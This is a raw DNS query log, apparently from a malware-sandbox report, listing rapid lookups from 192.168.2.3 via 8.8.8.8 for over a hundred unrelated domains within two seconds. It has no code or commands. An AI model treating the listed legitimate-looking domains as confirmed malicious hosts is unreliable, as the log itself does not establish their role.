                                                                                                                                                                              Sep 15, 2023 07:27:38.655736923 CEST8.8.8.8192.168.2.30x98c4Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.774018049 CEST8.8.8.8192.168.2.30x2959No error (0)ftchat.com172.67.140.52A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.774018049 CEST8.8.8.8192.168.2.30x2959No error (0)ftchat.com104.21.46.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.791627884 CEST8.8.8.8192.168.2.30xdbedNo error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.796585083 CEST8.8.8.8192.168.2.30x4121No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.796585083 CEST8.8.8.8192.168.2.30x4121No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.804167032 CEST8.8.8.8192.168.2.30x253dName error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.832057953 CEST8.8.8.8192.168.2.30x908bNo error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.832057953 CEST8.8.8.8192.168.2.30x908bNo error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.857893944 CEST8.8.8.8192.168.2.30x1564No error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.857893944 CEST8.8.8.8192.168.2.30x1564No error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.857893944 CEST8.8.8.8192.168.2.30x1564No error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.857893944 CEST8.8.8.8192.168.2.30x1564No error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.858855009 CEST8.8.8.8192.168.2.30x2b17No error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.858855009 CEST8.8.8.8192.168.2.30x2b17No error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.861169100 CEST8.8.8.8192.168.2.30xee7bName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.879031897 CEST8.8.8.8192.168.2.30x2c67No error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.912691116 CEST8.8.8.8192.168.2.30x847No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.933614016 CEST8.8.8.8192.168.2.30x72f8No error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.937827110 CEST8.8.8.8192.168.2.30xa600Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.966028929 CEST8.8.8.8192.168.2.30x891fNo error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.975912094 CEST8.8.8.8192.168.2.30x6974Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.980324984 CEST8.8.8.8192.168.2.30xdd48No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.019632101 CEST8.8.8.8192.168.2.30x434dNo error (0)bount.com.tw104.21.76.140A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.019632101 CEST8.8.8.8192.168.2.30x434dNo error (0)bount.com.tw172.67.196.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.019648075 CEST8.8.8.8192.168.2.30xdb7fNo error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.026580095 CEST8.8.8.8192.168.2.30x7bd0No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.026580095 CEST8.8.8.8192.168.2.30x7bd0No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.033581018 CEST8.8.8.8192.168.2.30xb53aNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.033581018 CEST8.8.8.8192.168.2.30xb53aNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.033581018 CEST8.8.8.8192.168.2.30xb53aNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.033581018 CEST8.8.8.8192.168.2.30xb53aNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.042541981 CEST8.8.8.8192.168.2.30x290aNo error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.098843098 CEST8.8.8.8192.168.2.30xeff7Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.127764940 CEST8.8.8.8192.168.2.30x757fNo error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.127764940 CEST8.8.8.8192.168.2.30x757fNo error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.135225058 CEST8.8.8.8192.168.2.30x2da8Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.141814947 CEST8.8.8.8192.168.2.30x48d3No error (0)tabbles.net80.211.41.39A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.164750099 CEST8.8.8.8192.168.2.30xcef3No error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.170778990 CEST8.8.8.8192.168.2.30xf545No error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.175750971 CEST8.8.8.8192.168.2.30x4abNo error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.203846931 CEST8.8.8.8192.168.2.30x851eNo error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.224327087 CEST8.8.8.8192.168.2.30xaecdNo error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.237298012 CEST8.8.8.8192.168.2.30xd4No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.237298012 CEST8.8.8.8192.168.2.30xd4No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.237298012 CEST8.8.8.8192.168.2.30xd4No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.262073994 CEST8.8.8.8192.168.2.30x4a9Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.281490088 CEST8.8.8.8192.168.2.30xd504No error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.281490088 CEST8.8.8.8192.168.2.30xd504No error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.292363882 CEST8.8.8.8192.168.2.30x8941No error (0)cjcagent.com72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.293603897 CEST8.8.8.8192.168.2.30x1a92No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.326247931 CEST8.8.8.8192.168.2.30x7ce0Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.339463949 CEST8.8.8.8192.168.2.30x661eNo error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.360181093 CEST8.8.8.8192.168.2.30x5791No error (0)ramkome.com145.239.5.159A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.414267063 CEST8.8.8.8192.168.2.30xc87No error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.414267063 CEST8.8.8.8192.168.2.30xc87No error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.419936895 CEST8.8.8.8192.168.2.30x9016No error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.449373007 CEST8.8.8.8192.168.2.30x2055No error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.464907885 CEST8.8.8.8192.168.2.30x6e25No error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.471015930 CEST8.8.8.8192.168.2.30xbe7aNo error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.476206064 CEST8.8.8.8192.168.2.30xf5dbNo error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.476206064 CEST8.8.8.8192.168.2.30xf5dbNo error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.477863073 CEST8.8.8.8192.168.2.30xf1faNo error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.477863073 CEST8.8.8.8192.168.2.30xf1faNo error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.477863073 CEST8.8.8.8192.168.2.30xf1faNo error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.485112906 CEST8.8.8.8192.168.2.30xee4cNo error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.501271963 CEST8.8.8.8192.168.2.30x21bcNo error (0)shiner.com104.21.27.205A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.501271963 CEST8.8.8.8192.168.2.30x21bcNo error (0)shiner.com172.67.143.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.517750978 CEST8.8.8.8192.168.2.30x5ce7No error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.523296118 CEST8.8.8.8192.168.2.30x2f66No error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.527581930 CEST8.8.8.8192.168.2.30x6745No error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.548250914 CEST8.8.8.8192.168.2.30xbf0dNo error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.548250914 CEST8.8.8.8192.168.2.30xbf0dNo error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.557295084 CEST8.8.8.8192.168.2.30x7241No error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.565958977 CEST8.8.8.8192.168.2.30x65fdNo error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.573950052 CEST8.8.8.8192.168.2.30x4d73No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.628604889 CEST8.8.8.8192.168.2.30xac48No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.638632059 CEST8.8.8.8192.168.2.30x9945No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.638632059 CEST8.8.8.8192.168.2.30x9945No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.638632059 CEST8.8.8.8192.168.2.30x9945No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.656959057 CEST8.8.8.8192.168.2.30x96bdNo error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.659703016 CEST8.8.8.8192.168.2.30xa2f8No error (0)rkengg.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.659703016 CEST8.8.8.8192.168.2.30xa2f8No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.659703016 CEST8.8.8.8192.168.2.30xa2f8No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.659703016 CEST8.8.8.8192.168.2.30xa2f8No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.659796000 CEST8.8.8.8192.168.2.30x3816No error (0)lyto.net104.21.62.182A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.659796000 CEST8.8.8.8192.168.2.30x3816No error (0)lyto.net172.67.138.3A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.666270971 CEST8.8.8.8192.168.2.30x51b4No error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.666476965 CEST8.8.8.8192.168.2.30xc409No error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.666476965 CEST8.8.8.8192.168.2.30xc409No error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.667463064 CEST8.8.8.8192.168.2.30x564cNo error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.667514086 CEST8.8.8.8192.168.2.30x9a14No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.671324015 CEST8.8.8.8192.168.2.30x3a3No error (0)gujarat.com104.21.73.143A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.671324015 CEST8.8.8.8192.168.2.30x3a3No error (0)gujarat.com172.67.145.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.690217018 CEST8.8.8.8192.168.2.30x6bc6No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.696145058 CEST8.8.8.8192.168.2.30xe587No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.709244013 CEST8.8.8.8192.168.2.30x61b9No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.709657907 CEST8.8.8.8192.168.2.30x9a7aName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.711545944 CEST8.8.8.8192.168.2.30xabe2No error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.763386965 CEST8.8.8.8192.168.2.30x5564No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.795824051 CEST8.8.8.8192.168.2.30xe907No error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.795824051 CEST8.8.8.8192.168.2.30xe907No error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.817842007 CEST8.8.8.8192.168.2.30xfe90Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.824651003 CEST8.8.8.8192.168.2.30x30e1No error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.833636045 CEST8.8.8.8192.168.2.30x2f27No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.838808060 CEST8.8.8.8192.168.2.30xbb3No error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.839349985 CEST8.8.8.8192.168.2.30x329No error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.854865074 CEST8.8.8.8192.168.2.30xdd14No error (0)hyab.se104.21.52.126A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.854865074 CEST8.8.8.8192.168.2.30xdd14No error (0)hyab.se172.67.199.57A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.870518923 CEST8.8.8.8192.168.2.30xcbebNo error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.905251980 CEST8.8.8.8192.168.2.30x6bc1No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.905251980 CEST8.8.8.8192.168.2.30x6bc1No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.917546034 CEST8.8.8.8192.168.2.30xf575No error (0)oozkranj.com212.44.102.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.923566103 CEST8.8.8.8192.168.2.30x80fcName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.927077055 CEST8.8.8.8192.168.2.30x8b2fNo error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.928123951 CEST8.8.8.8192.168.2.30x3de4No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.962014914 CEST8.8.8.8192.168.2.30xa90aNo error (0)shiner.com104.21.27.205A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.962014914 CEST8.8.8.8192.168.2.30xa90aNo error (0)shiner.com172.67.143.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.990268946 CEST8.8.8.8192.168.2.30x5b4cNo error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.990268946 CEST8.8.8.8192.168.2.30x5b4cNo error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.991553068 CEST8.8.8.8192.168.2.30x6baeNo error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.991553068 CEST8.8.8.8192.168.2.30x6baeNo error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.991553068 CEST8.8.8.8192.168.2.30x6baeNo error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.054698944 CEST8.8.8.8192.168.2.30x942cNo error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.057118893 CEST8.8.8.8192.168.2.30xd571No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.062714100 CEST8.8.8.8192.168.2.30x2732No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.074371099 CEST8.8.8.8192.168.2.30x31b5No error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.074371099 CEST8.8.8.8192.168.2.30x31b5No error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.087615013 CEST8.8.8.8192.168.2.30x33cNo error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.097347975 CEST8.8.8.8192.168.2.30xc30cNo error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.101417065 CEST8.8.8.8192.168.2.30x9ce0No error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.102509975 CEST8.8.8.8192.168.2.30x4a2dNo error (0)kayoaiba.com47.91.170.222A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.245415926 CEST8.8.8.8192.168.2.30x46c9No error (0)78san.com133.242.15.119A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.307379961 CEST8.8.8.8192.168.2.30x7b1eNo error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.308099985 CEST8.8.8.8192.168.2.30x16e4No error (0)sanfotek.net216.69.141.67A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.312145948 CEST8.8.8.8192.168.2.30xf4b7No error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.337156057 CEST8.8.8.8192.168.2.30x6e3dNo error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.347857952 CEST8.8.8.8192.168.2.30xd1baServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.356945992 CEST8.8.8.8192.168.2.30x5d1dNo error (0)diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.368613005 CEST8.8.8.8192.168.2.30x3021No error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.374903917 CEST8.8.8.8192.168.2.30x709bNo error (0)sigtoa.com172.67.160.168A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.374903917 CEST8.8.8.8192.168.2.30x709bNo error (0)sigtoa.com104.21.49.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.380747080 CEST8.8.8.8192.168.2.30xc00eNo error (0)webways.com104.21.1.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.380747080 CEST8.8.8.8192.168.2.30xc00eNo error (0)webways.com172.67.128.139A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.459254026 CEST8.8.8.8192.168.2.30x6994No error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.459254026 CEST8.8.8.8192.168.2.30x6994No error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.476670980 CEST8.8.8.8192.168.2.30x56b4No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.481357098 CEST8.8.8.8192.168.2.30x3359No error (0)x96.com172.67.167.96A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.481357098 CEST8.8.8.8192.168.2.30x3359No error (0)x96.com104.21.73.229A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.482127905 CEST8.8.8.8192.168.2.30x515aServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.513998032 CEST8.8.8.8192.168.2.30xf48fNo error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.514861107 CEST8.8.8.8192.168.2.30x2810No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.514861107 CEST8.8.8.8192.168.2.30x2810No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.521281004 CEST8.8.8.8192.168.2.30x7e0fNo error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.538600922 CEST8.8.8.8192.168.2.30xf35eNo error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.538600922 CEST8.8.8.8192.168.2.30xf35eNo error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.538600922 CEST8.8.8.8192.168.2.30xf35eNo error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.549536943 CEST8.8.8.8192.168.2.30xc0a2No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.558548927 CEST8.8.8.8192.168.2.30x3517No error (0)hbfuels.com85.233.160.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.598870993 CEST8.8.8.8192.168.2.30x5e44No error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.666163921 CEST8.8.8.8192.168.2.30x98c4Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.683054924 CEST8.8.8.8192.168.2.30xb61fNo error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.709290028 CEST8.8.8.8192.168.2.30x6ec5No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.757571936 CEST8.8.8.8192.168.2.30xd881No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.772381067 CEST8.8.8.8192.168.2.30x6e90No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.772381067 CEST8.8.8.8192.168.2.30x6e90No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.772381067 CEST8.8.8.8192.168.2.30x6e90No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.782182932 CEST8.8.8.8192.168.2.30x7bd7No error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.793965101 CEST8.8.8.8192.168.2.30xcfa1Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.794080019 CEST8.8.8.8192.168.2.30xa9aeNo error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.808348894 CEST8.8.8.8192.168.2.30xcce0No error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.815592051 CEST8.8.8.8192.168.2.30x6d25No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
